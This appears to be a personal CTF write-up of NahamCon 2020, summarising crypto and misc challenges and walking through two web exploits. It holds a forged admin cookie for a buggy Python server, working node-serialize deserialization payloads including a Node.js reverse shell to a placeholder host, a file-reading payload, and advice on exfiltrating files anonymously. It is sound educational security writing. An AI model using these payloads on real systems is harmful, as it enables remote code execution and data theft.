# NahamCon 

##### Jun 15, 2020

[NahamCon CTF](https://ctftime.org/event/1067) was a fun event last weekend.
I only had about 10 hours for it, so I did what tends to suit me best: crypto plus some misc challenges.
Overall I scored close to 1500, which is OK but there is always room to do more.

### Crypto

The crypto problems were largely a let-down, easy and/or of a guess-my-encryption type:

* **Docxor** was an attack on short-key-length xor with a guessable plaintext prefix (magic bytes)
* **Homecooked** was a custom scheme with super-slow decryption because of an inefficient primality test
* **Ooo-la-la** was a factorization attack on very-short-key RSA
* **Raspberry** was like RSA but with a modulus that was a product of many small primes (so another factorization attack)
* **December** was an attack on DES (you had to guess that one of the weak keys was used)
* **Twinning** was another short-key RSA factorization attack (once you realized that this always had p = q + 2, 
you could just solve for the primes)
* **Unvreakable Vase** was about reversing lower-cased base64 (e.g., you could check various capitalizations and see what they gave)
* I did not solve **Elsa4** during the contest - it was [LC4](https://www.schneier.com/blog/archives/2018/05/lc4_another_pen.html) encryption with a time-based random seed for the nonce
(you had to guess exactly how the seed was set)

### Misc

The misc problems did have some educational moments:

* **SSH Logger** was about stealing an SSH password as root via process monitoring (e.g., stracing children of sshd and snooping on strings read)
* **Glimpse** had a setuid-root Gimp 2.8 binary to exploit (you can actually run Python code with Gimp!)
* **Trapped** was about escaping`trap`in bash (by invoking trap again :o)
* in **Alkatraz** you had to read/print the flag file in restricted bash with no`cd`, no redirects, no / in executables, no history, readonly PATH and SHELLOPTS, and only`ls`in PATH (you could still load the file into history)
* **Awkward** was about exfiltrating the flag file using`awk`but there was no text output at all, you could only obtain exit codes (use getline, then leak the ascii code of the result character by character)
* **Fake File** was about finding a hidden flag file (`find . -exec grep ...` worked just fine)

### Some more poking around

Obviously, there is still much to learn. After the contest, I took a look at some of the web challenges:

* **Agent_95** was about faking a [Windows 95 user agent](https://developers.whatismybrowser.com/useragents/parse/2520-internet-explorer-windows-trident) header
* **Localghost** had data embedded in Javascript variables (probably lifted directly from another CTF because 
they had not adjusted the flag format :P)
* **Phphonebook** wanted you to guess the variable name to use in a POST request to trigger an emergency (it is *emergency*)
* in **Official Business** you had to exploit cookie verification in a buggy Python server 
(the server code was given away in robots.txt - this is only a CTF afterall :)
* **Seriously** was a Node JS [unserialization](https://ajinabraham.com/blog/exploiting-deserialization-bugs-in-nodejs-modules-for-remote-code-execution) exploit, setting up an 
[immediately invoked function expression](https://developer.mozilla.org/en-US/docs/Glossary/IIFE)
(the best trick I have learned from NahamCon challenges so far)

### Official Business

Hindsight is always 20/20, of course, but it can also give insight into the typical heuristics people use when
they race against time. Take, for example, **Official Business**: the job was to "log in as admin", and one could
get the [server code](/posts/NahamCon2020_Official_Business-server.py). The options looked like:

* matching the admin username and password

   ```python
user == "hacker"  
sha512(password) == b"hackshackshackshackshackshackshackshackshackshackshackshackshack"
```

    ...but good luck with inverting SHA512.

* or, engineering (in hex form) a JSON cookie for which control makes it to the end of the function

   ```python
def load_cookie():

    cookie = {}
    auth = request.cookies.get("auth")

    if auth:

        try:
            cookie = json.loads(binascii.unhexlify(auth).decode("utf8"))
            digest = cookie.pop("digest")
            if (
                digest
                != hashlib.sha512(
                    app.secret_key + bytes(json.dumps(cookie, sort_keys=True), "ascii")
                ).hexdigest()
            ):
                return False, {}
        except:
            pass

    return True, cookie
```

    so that it returns`True,...` The code checks for a cookie named *auth* that has a *digest* property,
which is then used in an integrity check on the cookie that involves the server's *secret_key*.
It may feel like "Game over" since that key is not known. However, *secret_key* turns out to be a Python string

   ```python
app.secret_key = open("secret_key", "r").read().strip()
```

    so concatenation with bytes inside the check throws an exception, and thus *any* digest passes!
(It would even be simpler not to have the cookie because then the whole if block is skipped;
however, in the index() function you need the *admin* property set to *True* to get the flag rendered.)

In the end, all that is required is a cookie`{"admin": True}`, which can be sent via a one-liner in curl. 
But it was likely [quicker](https://ctftime.org/writeup/21461) to get to the flag by simply trying 
a combination of whatever unique values appear in the code:

   ```python
{"user": "hacker", "password": "password", "digest": "hackshackshackshackshackshackshackshackshackshackshackshackshack", "admin": True}
```


### Seriously

My favorite problem at NahamCon is the Node JS unserialization exploit - **Seriously**. 
With a carefully crafted *cart* cookie in the challenge, the`server:port/cart` page that displayed the 
shopping cart could be used to execute arbitrary JS code on the server.
I have not heard about this vulnerability before,
so I decided to play with it.

Normally the cart cookie corresponded to something like
```js
{"items": {"0": {"name": "Haworthiopsis attenuata", "price": 19.99, "count": 1}}}
```
converted to string and then encoded via base64. 
But there were no integrity checks, so you could alter the cookie any way you wanted.
It so turns out that one can specify function-valued properties, and even so called 
[immediately invoked function expressions](https://developer.mozilla.org/en-US/docs/Glossary/IIFE) (IIFEs) that are called right away
when the cookie is unserialized (i.e., converted back from string) by the server.


#### Reverse shell

One [writeup](https://github.com/empty-jack/ctf-writeups/blob/master/NahamCONCTF-2020/web-seriously.md) exploited this
to spawn a reverse shell, so I tried a variation on that too. You do not need eval(String.fromCharCode(...)) part, just define
your function expression directly and serialize that:

```js
var c = {"items": {"0": {"name": function() {
               var client = new require('net').Socket()
               client.connect("PORT", "HOSTIP", function() {
                  var sh = require('child_process').spawn('/bin/sh',[]);
                  client.write("Connected!\n");
                  client.pipe(sh.stdin);
                  sh.stdout.pipe(client);
                  sh.stderr.pipe(client);
                  sh.on('exit',function(code,signal){
                     client.end("Disconnected!\n");
                  });
               });
            }
          }}}

var c_ser = require('node-serialize').serialize(c)
c_ser = c_ser.replace('}"}}', '}()"}}')        // insert () to make it an IIFE

console.log((new Buffer(c_ser)).toString('base64'))
```

A shell is nice because it gives a lot of freedom besides finding flag.txt and printing its contents.
For instance, you can tar-gzip the whole challenge directory and exfiltrate it (about 5 MB). 
There were no networking binaries (nc, curl, telnet...) on the server but it did have a C compiler, so you could easily do TCP over 
sockets. Or just cat the tarball and redirect netcat's output stream.  

Looking at the server code, the exploit activates at

```js
cart = serialize.unserialize(Buffer.from(cart, 'base64').toString('ascii'));
return res.render('cart', { cart: cart, user: user });
```

i.e., the shell spawns right before the assignment to *cart*, then the unserialized object is used to render the cart page.
(You did not even need to have the auth cookie for this to work.)


#### Exfiltration to browser

A reverse shell is useful but it is definitely an overkill. Moreover, it is a giant beacon to the perpetrator's computer
on the internet. It is much more anonymous to exfiltrate the flag to the browser, e.g., Tor Browser 
(or you could even curl through Tor). 
We have arbitrary code execution, so it is easy - just have the IIFE return the flag as a string:

```js
var c = {"items": {"0": {"name": function() {
               return require('fs').readFileSync("flag.txt");
            },"price": 987,"count": 2
          }}}

var c_ser = require('node-serialize').serialize(c)
c_ser = c_ser.replace('}","price', '}()","price')   // make it into an IIFE

console.log((new Buffer(c_ser)).toString('base64'))
```

This way, when the cart is rendered, the name of the plant is the flag.

Using analogous steps, you can exfiltrate any file (such as the challenge directory tarball) by preparing it, reading it, converting
it to base64, and putting the result in place of the plant name. There were no limits on HTTP response length, so getting a 10-MB
base64 string out worked just fine in the challenge.

---

[back](/)
